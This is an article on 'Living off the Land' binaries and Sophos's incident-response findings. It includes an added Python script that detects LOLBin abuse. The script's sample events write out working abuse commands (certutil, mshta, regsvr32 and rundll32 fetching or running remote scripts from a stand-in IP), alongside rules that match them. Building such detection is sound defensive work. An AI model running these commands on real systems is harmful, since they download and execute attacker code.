Some of the most dangerous tools in an attacker’s kit are the ones that, in any other context, would pass entirely unnoticed. Known as LOLBins – a reference to ‘Living off the Land’ binaries, rather than the practice of maniacally laughing at refuse receptacles – these are not vulnerabilities in the usual sense. They are legitimate, often signed executables that ship with the operating system (utilities for fetching files, running scripts or registering components) and that attackers repurpose for their own ends. Because the binary itself is trusted and present on every machine, its misuse blends in with ordinary administration, slips past controls that only look for unknown or malicious files, and is eagerly sought after by your average cybercriminal.
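To make the LOLBin idea concrete, here is an added example (not code from the article, and not Sophos’s tooling) that runs a handful of detection rules over constructed process-creation events. The rule names and the key=value log format are assumptions made for illustration; the argument patterns (certutil pulling a file from a URL, mshta executing a remote HTA, regsvr32 loading a remote scriptlet, rundll32 running inline script) are the well-documented abuse syntax for each binary.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events in a simple key=value form (not real telemetry).
SAMPLE_EVENTS = [
    r'host=ws01 user=alice image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -urlcache -split -f http://203.0.113.5/p.txt C:\Users\Public\p.exe"',
    r'host=ws01 user=alice image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -verify C:\Temp\cert.cer"',
    r'host=ws02 user=bob image=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://203.0.113.5/a.hta"',
    r'host=ws02 user=bob image=C:\Windows\System32\regsvr32.exe cmdline="regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"',
    r'host=ws03 user=svc image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;alert(1)"',
    r'host=ws03 user=svc image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe shell32.dll,Control_RunDLL"',
    r'host=ws04 user=carol image=C:\Program Files\App\app.exe cmdline="app.exe --update"',
    "garbage line that does not parse",
]

# Parser for the assumed log format: image may contain spaces, cmdline is the last field.
EVENT_RE = re.compile(r'^host=(\S+) user=(\S+) image=(.+?) cmdline="(.*)"$')

# (hypothetical rule name, binary, command-line pattern). The binary alone is never the
# signal; every rule keys on the argument pattern that marks abuse rather than normal use.
RULES = [
    ("certutil_remote_download", "certutil.exe", re.compile(r"\burlcache\b.*\bhttps?://", re.I)),
    ("mshta_remote_script", "mshta.exe", re.compile(r"\bhttps?://|\b(?:javascript|vbscript):", re.I)),
    ("regsvr32_squiblydoo", "regsvr32.exe", re.compile(r"/i:\S*https?://", re.I)),
    ("rundll32_script", "rundll32.exe", re.compile(r"\b(?:javascript|vbscript):", re.I)),
]


@dataclass
class Alert:
    rule: str
    host: str
    user: str
    cmdline: str


def parse_event(line):
    """Return a dict for a well-formed event line, or None for anything else."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def detect(lines):
    """Apply every rule to every parseable event; one Alert per (event, rule) hit."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        binary = ev["image"].rsplit("\\", 1)[-1].lower()
        for rule, target, pattern in RULES:
            if binary == target and pattern.search(ev["cmdline"]):
                alerts.append(Alert(rule, ev["host"], ev["user"], ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host} {a.user}: {a.cmdline}")
```

Run against the sample, the benign certutil, rundll32 and app.exe events produce nothing and the four abuse events each raise one alert. Matching on the file name is the weak part of this sketch: an attacker can copy certutil.exe to another name, so in production the match should be on the binary’s original file name as recorded by the endpoint sensor, with parent-process and user context added to cut false positives.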
Then, of course, comes the cornucopia of conventional vulnerabilities that provide threat actors with a window into the inner workings of your corporation. According to Sophos’s new ‘Active Adversary Report for Business Leaders’, an analysis of 152 incident response (IR) investigations across 31 countries, the ProxyShell and Log4Shell vulnerabilities loomed particularly large. Compromised credentials are another particular source of concern, explains John Shier, the cybersecurity firm’s field CTO.
“When today’s attackers aren’t breaking in, they’re logging in,” says Shier. “The reality is that the threat environment has grown in volume and complexity to the point where there are no discernible gaps for defenders to exploit. For most organisations, the days of going at it alone are well behind them.”
Ransomware epidemic
Ransomware, meanwhile, has halted its exponential growth as an attack method. Even so, it remains a plague: two-thirds of the firms investigated by the Sophos IR team were dealing with this form of digital hostage-taking, unsurprising given that ransomware has featured in almost three-quarters of the team’s investigations over the past three years. Attacker dwell time is also decreasing. Sophos data reveals that, across all attack types, threat actors spent an average of ten days inside company systems, down from 15 the previous year, and that figure did not vary with company size.
There are solutions out there: services that help companies build defence in depth to better shield themselves from attack. “Organisations that have successfully implemented layered defences with constant monitoring are seeing better outcomes in terms of attack severity,” says Shier. The reasoning is simple: stronger layered defences force adversaries to move faster, and moving faster makes them noisier and more visible to the security team, so they are detected and dealt with at a much earlier stage than they otherwise would have been. Conversely, adds Shier, “those without proactive monitoring will suffer the greatest consequences”.
Businesses should not lose heart, therefore. While the threat environment is continually evolving, Sophos remains ready to blunt the opportunistic adventures of cybercriminals, offering services such as its cloud-based central management console and access to Sophos X-Ops, its cross-domain threat intelligence unit. “It truly is everything, everywhere, all at once,” says Shier of the current threat environment. “However, there are tools and services available to businesses that can alleviate some of the defensive burden, allowing them to focus on their core business priorities.”